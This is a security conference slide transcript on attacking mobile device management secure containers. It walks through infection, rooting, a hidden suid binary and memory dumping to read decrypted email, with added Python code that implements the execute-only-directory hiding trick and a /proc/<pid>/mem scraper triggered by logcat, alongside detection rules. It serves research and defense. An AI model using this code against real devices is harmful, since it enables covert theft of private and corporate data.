Practical Attacks against Mobile Device Management Solutions - PowerPoint PPT Presentation

  1. Practical Attacks against Mobile Device Management Solutions Michael Shaulov, CEO michael@lacoon.com Daniel Brodie, Sr Security Researcher daniel@lacoon.com

  2. About: Daniel • Security researcher for nearly a decade • From PC to Mobile • Researcher and Developer at Lacoon • Developing an App Analysis framework for spyphones and mobile malware

  3. About: Michael • Decade of experience researching and working in the mobile security space, from feature-phones to smartphones • Mobile Security Research Team Leader at NICE Systems • CEO and co-founder of Lacoon Mobile Security

  4-6. Targeted Attacks: From PC to Malware (one slide shown in three builds; labels around the device image) • Convergence of Personal and Business • Ubiquitous • Perfect Surveillance Hardware

  7. Agenda • Rise of the spyphones • Introduction to MDM and Secure Containers • Bypassing secure container encryption capabilities • Recommendations and summary

  8. TARGETED MOBILE THREATS

  9. The Mobile Threatscape (chart: Business Impact against Complexity) • Targeted: Spyphones. Impact on the Organization; cyber espionage. High complexity, high business impact • Consumer-oriented, mass mobile malware. Impact on the Personal side; financially motivated, e.g. premium SMS apps, fraudulent charges, botnets

  10. Mobile Remote Access Trojans (aka Spyphones)

  11. Recent High-Profiled Examples

  12. Commercial mRATS

  13. A Double-Edged Sword Back-Up mRAT

  14-15. Survey: Cellular Network • 2M subscribers, sampling: 500K • Infection rates, June 2013: 1 / 800 devices

  16. MDM and SECURE CONTAINERS 101

  17. Mobile Device Management • Policy and configuration management tool • Helps enterprises manage BYOD and mobile computing environment • Offerings include separating between business data and personal data

  18. MDM: Penetration in the Market “Over the 5 years, 65% of enterprises will adopt a mobile device management (MDM) solution for their corporate liable users” Gartner, Inc. October 2012

  19. MDM Key Capabilities • Software management • Network service management • Hardware management • Security management: remote wipe, secure configuration enforcement, encryption

  20. Secure Containers All leading MDM solutions provide secure containers: MobileIron, AirWatch, Fiberlink, Zenprise, Good Technology

  21. Behind the Scenes: Secure Containers (diagram) • Application Sandbox • Secure Communication (SSL) to the Enterprise • Encrypted Storage

  22. MDMs and Secure Containers 3 assumptions: 1. Encrypt business data 2. Encrypt communications to the business (SSL/VPN) 3. Detect Jailbreak/Rooting of devices

  23. MDMs and Secure Containers Let’s test these assumptions…

  24. BYPASSING MOBILE DEVICE MANAGEMENT (MDM) SOLUTIONS

  25. Overview Infect the device → Install Backdoor → Bypass containerization → Exfiltrate Information

  26. DEMO ANDROID

  27. Step 1: Infect the Device

  28. Step 1: Technical Details • Publish an app through the market • Use a "Two-Stage" design: the published app is benign; the rest of the dex (Dalvik bytecode) is downloaded later, and only to the targets we want • Get the target to install the app, through spearphishing or physical access to the device

  29. Step 2: Install a Backdoor (i.e. Rooting) • Root: any process can run as the root user if it is able to trigger a vulnerability in the OS • Vulnerability: Android device vulnerabilities are abundant • Exploit: on-device detection mechanisms cannot see an app exploiting the vulnerability

  30. Step 2: Technical Details • Privilege escalation: we used the Exynos exploit (released Dec. 2012; the /dev/exynos-mem driver bug, CVE-2012-6422, that let any app map physical memory read/write) • Create a hidden 'suid' binary and use it only for specific actions, instead of the usual su binary that root detectors look for • Place it in a folder with --x--x--x permissions: the directory can be traversed by anyone who knows the file name but cannot be listed, so it stays undetected by generic root detectors that scan for known su paths or walk the filesystem
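As an added example (not from the talk and not Lacoon's code), the script below reproduces the execute-only-directory trick on a throwaway directory and runs two detectors against it: a walk-the-filesystem scan for setuid files, which misses the planted binary, and a scan that treats the hiding pattern itself (a directory with mode 0111) as the indicator. The directory and file names are assumptions for the demo.

```python
"""Added example (not from the Lacoon talk): reproduce the "hidden suid binary in an
execute-only directory" trick and compare two root detectors against it.
Paths and file names are made up for the demo; everything happens under a
temporary directory, so nothing on the real system is changed."""
import os
import shutil
import stat
import tempfile


def plant_hidden_suid(base):
    """Create <base>/.cache/.s with the setuid bit and make .cache execute-only (0111).
    A process that knows the full path can still execute the binary; a process that
    does not cannot list the directory to discover it (root excepted)."""
    hidden_dir = os.path.join(base, ".cache")
    os.mkdir(hidden_dir)
    binary = os.path.join(hidden_dir, ".s")
    with open(binary, "w") as f:
        f.write("#!/bin/sh\nid\n")           # stand-in for the real suid shell
    os.chmod(binary, 0o4711)                 # setuid for the owner, execute-only for others
    os.chmod(hidden_dir, 0o111)              # --x--x--x: traversable but not listable
    return hidden_dir, binary


def naive_root_scan(base):
    """Typical 'look for setuid binaries' detector: walks the tree with os.walk, which
    silently skips any directory it cannot read, so the planted file is never seen
    (unless the scanner itself already runs as root)."""
    found = []
    for root, _dirs, files in os.walk(base):
        for name in files:
            path = os.path.join(root, name)
            try:
                if os.stat(path).st_mode & stat.S_ISUID:
                    found.append(path)
            except OSError:
                pass
    return found


def execute_only_dirs(base):
    """Detector that treats the hiding technique itself as the indicator: a directory
    whose mode is exactly 0111 is suspicious, and its mode is visible from the readable
    parent even though its contents are not."""
    hits = []
    for root, dirs, _files in os.walk(base):
        for name in dirs:
            path = os.path.join(root, name)
            try:
                mode = stat.S_IMODE(os.stat(path).st_mode)
            except OSError:
                continue
            if mode == 0o111:
                hits.append(path)
    return hits


def demo():
    """Plant the binary in a temporary tree, run both detectors, clean up."""
    base = tempfile.mkdtemp(prefix="mdm_demo_")
    try:
        hidden_dir, planted = plant_hidden_suid(base)
        result = {
            "hidden_dir": hidden_dir,
            "planted": planted,
            "naive_scan": naive_root_scan(base),
            "exec_only_dirs": execute_only_dirs(base),
            "running_as_root": os.geteuid() == 0,
        }
    finally:
        try:
            os.chmod(os.path.join(base, ".cache"), 0o700)   # make it deletable again
        except OSError:
            pass
        shutil.rmtree(base, ignore_errors=True)
    return result


if __name__ == "__main__":
    print(demo())
```

Run as an ordinary user, naive_scan comes back empty while exec_only_dirs names the hiding directory; run as root, both find it, which is exactly the asymmetry the slide relies on: the detector on the device is not root, the attacker is.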

  31-33. Step 3: Bypass Containerization (diagram, three builds) Storage: "Jo, yjod od sm r,so;" (the email, encrypted at rest) → Memory: "Hi, This is an email" (the same email, decrypted once the user opens it)

  34. Step 3: Technical Details • We listen to events in the log (logcat) • For Android <= 2.3 we can just use the logging permission (READ_LOGS) • For > 4.0, where third-party apps are no longer granted READ_LOGS, we access the logs as root • When an email is read…

  35. Step 4: Exfiltrate Information (diagram) Storage: "Jo, yjod od sm r,so;" → Memory: "Hi, This is an email" → Exfiltrate information

  36. Step 4: Technical Details • We dump the heap using /proc/<pid>/maps (to find the regions) and /proc/<pid>/mem (to read them) • Then search for the email structure, extract it, and send it home
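Added example, not code from the talk, of Android steps 3 and 4 in miniature: watch logcat-style output for the email viewer coming to the foreground, learn its pid from ActivityManager's earlier "Start proc" line, then parse /proc/<pid>/maps and read /proc/<pid>/mem looking for the plaintext. The package and activity names, the log lines and the "email structure" (a constructed RFC 822-style header) are assumptions. Reading another process's memory needs root (the reason for step 2); run stand-alone, the demo targets its own process, which any user may read on Linux.

```python
"""Added example (not from the Lacoon talk): log-triggered memory scraping.
watch_logcat() finds the target pid, scan_process() searches its writable memory.
Package/activity names and the log lines are constructed for the demo."""
import os
import re

# Hypothetical target: the stock Email app's message viewer.
WATCHED_ACTIVITIES = {"com.android.email/.activity.MessageView"}

START_PROC = re.compile(r"Start proc (\S+) for .*?: pid=(\d+)")
DISPLAYED = re.compile(r"Displayed (\S+/\S+): \+")


def watch_logcat(lines):
    """Return (package, pid) each time a watched activity is displayed. The pid comes
    from ActivityManager's 'Start proc <pkg> ... pid=N' line for that package; the
    pid in parentheses on a logcat line is the logger (system_server), not the app."""
    pids = {}
    events = []
    for line in lines:
        m = START_PROC.search(line)
        if m:
            pids[m.group(1)] = int(m.group(2))
            continue
        m = DISPLAYED.search(line)
        if m and m.group(1) in WATCHED_ACTIVITIES:
            pkg = m.group(1).split("/")[0]
            events.append((pkg, pids.get(pkg)))
    return events


def writable_regions(pid):
    """Parse /proc/<pid>/maps and yield (start, end) of private writable mappings:
    heap, anonymous malloc/mmap chunks and stacks, where decrypted data lives."""
    with open(f"/proc/{pid}/maps") as f:
        for line in f:
            addr, perms = line.split()[:2]
            if perms.startswith("rw") and perms[3] == "p":
                start, end = (int(x, 16) for x in addr.split("-"))
                if end < 1 << 63:          # skip kernel-side mappings pread cannot seek to
                    yield start, end


def scan_process(pid, pattern, chunk=1 << 20):
    """Search every writable region of <pid> for <pattern> by reading /proc/<pid>/mem
    in chunks that overlap by len(pattern)-1, so a match straddling a chunk boundary
    is not missed. Returns the virtual addresses at which the pattern was found."""
    hits = []
    fd = os.open(f"/proc/{pid}/mem", os.O_RDONLY)
    try:
        for start, end in writable_regions(pid):
            pos, tail = start, b""
            while pos < end:
                try:
                    data = os.pread(fd, min(chunk, end - pos), pos)
                except OSError:           # e.g. region unmapped since maps was read
                    break
                if not data:
                    break
                buf = tail + data          # buf[0] is at address pos - len(tail)
                off = buf.find(pattern)
                while off != -1:
                    hits.append(pos - len(tail) + off)
                    off = buf.find(pattern, off + 1)
                tail = buf[-(len(pattern) - 1):] if len(pattern) > 1 else b""
                pos += len(data)
    finally:
        os.close(fd)
    return sorted(set(hits))


def demo():
    """Stand-alone run: constructed logcat lines name this process as the email app,
    a 'decrypted email' is placed on our own heap, and the scanner recovers it."""
    me = os.getpid()
    lines = [                                   # constructed logcat lines
        f"I/ActivityManager(  567): Start proc com.android.email for activity "
        f"com.android.email/.activity.Welcome: pid={me} uid=10012 gids={{3003}}",
        "I/ActivityManager(  567): Displayed com.android.email/.activity.MessageView: +312ms",
    ]
    events = watch_logcat(lines)
    subject = b"Subject: Q3 board deck (constructed)"
    email = (b"From: cfo@example.test\r\n" + subject + b"\r\n\r\nHi, this is an email\r\n") * 32
    pid = events[0][1] if events else None
    if pid is None or not os.path.exists("/proc/self/maps"):
        return {"pid": me, "events": events, "hits": None}
    try:
        hits = len(scan_process(pid, subject))
    except OSError:                             # /proc/<pid>/mem not readable here
        hits = None
    del email
    return {"pid": me, "events": events, "hits": hits}


if __name__ == "__main__":
    print(demo())
```

Two practical points the slide glosses over: maps must be re-read if the target allocates between the trigger and the dump (hence the per-read OSError handling), and searching only private writable regions keeps the dump small while still covering everything malloc, mmap and the Dalvik heap hand out.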

  37. DEMO IOS

  38. Step 1: Infect the device

  39. Step 2: Install a Backdoor (i.e. Jailbreaking) • Community jailbreaks • xCon (hides the jailbreak from apps that check for it)

  40. Step 2: Technical Details • Install a signed application, using an Enterprise/Developer certificate • Use the jailbreak to complete the hooking • Remove any trace of the jailbreak

  41. Step 3: Bypass Containerization • Load the malicious dylib into memory (it's signed!) • Hook using the standard Objective-C hooking mechanisms • Get notified when an email is read • Pull the email from the UI classes

  42. MITIGATION TECHNIQUES

  43. MDM MDMs are good for: • Management • Compliance enforcement • DLP • Physical loss However…

  44. MDM is static and inefficient against the dynamic nature of cybercrime

  45. Do We Have Visibility?

  46. Can We Assess Risk in Real-Time?

  47. Can We Mitigate Targeted Threats?

  48. Attacks are going to happen It’s a question of assessing risk And mitigating the effects

  49. “Life is inherently risky. There is only one big risk you should avoid at all costs, and that is the risk of doing nothing.” Denis Waitley

  50. Risk Metrics / Visibility • Vulnerabilities and Usage: Is the device up-to-date? Any known vulnerabilities pertaining to the OS? Is the device connecting to a public hotspot? • App Behavioral Analysis: What is the common app behavior? (static analysis) What is the app doing? (dynamic analysis) • Funky Correlation of Events: Is the device sending an SMS when the phone is locked?
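Added example (not from the talk): the "SMS sent while the phone is locked" correlation from the slide, written as a stateful rule over a constructed event stream, with the premium short-code check from the threatscape slide used to rank the alert. Event kinds, fields, package names and timestamps are assumptions; on a device they would come from screen-state broadcasts, SMS sent-intents and foreground-app telemetry.

```python
"""Added example (not from the Lacoon talk): a correlation rule for the
"SMS while locked" indicator. Event schema and sample data are constructed."""
from dataclasses import dataclass


@dataclass
class Event:
    ts: int          # seconds since some epoch
    kind: str        # screen_locked | screen_unlocked | app_foreground | sms_sent
    app: str = ""    # package that caused the event, where known
    to: str = ""     # destination number, for sms_sent


def is_premium_shortcode(number):
    """Heuristic: premium-rate SMS services use short codes (4-6 digits),
    not full subscriber numbers."""
    digits = number.lstrip("+")
    return digits.isdigit() and 4 <= len(digits) <= 6


def sms_while_locked(events, grace=5):
    """Flag every SMS sent while the screen is locked, except within <grace>
    seconds of locking (the user may have hit send and then locked the phone).
    Each alert records how long the device had been locked and whether the
    destination looks like a premium short code."""
    locked_at = None
    foreground = None
    alerts = []
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.kind == "screen_locked":
            locked_at = e.ts
        elif e.kind == "screen_unlocked":
            locked_at = None
        elif e.kind == "app_foreground":
            foreground = e.app
        elif e.kind == "sms_sent" and locked_at is not None and e.ts - locked_at > grace:
            alerts.append({
                "ts": e.ts,
                "app": e.app or foreground or "unknown",
                "to": e.to,
                "locked_for": e.ts - locked_at,
                "premium": is_premium_shortcode(e.to),
            })
    return alerts


# Constructed telemetry: normal use, a lock, then a background send to a short code.
SAMPLE_EVENTS = [
    Event(0, "screen_unlocked"),
    Event(10, "app_foreground", app="com.android.mms"),
    Event(30, "sms_sent", app="com.android.mms", to="+15551230000"),  # user, unlocked
    Event(40, "screen_locked"),
    Event(42, "sms_sent", app="com.android.mms", to="+15551230000"),  # inside grace period
    Event(600, "sms_sent", app="com.example.backup", to="5151"),       # hypothetical mRAT
    Event(900, "screen_unlocked"),
    Event(905, "sms_sent", app="com.android.mms", to="+15551230000"),
]


def demo():
    return sms_while_locked(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The rule fires once, on the send from the hypothetical backup app ten minutes into the lock, and leaves the user's own messages alone; the grace window is the knob that trades false positives for a slower detection.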

  51. Risk Metrics / Real-Time Assessment Network Behavioral Analysis • Anomaly detection of communications of apps • Outgoing content inspection (unencrypted) • Blocking of exploit and drive-by attacks

  52. Thank You. Michael Shaulov, CEO michael@lacoon.com Daniel Brodie, Sr Security Researcher daniel@lacoon.com
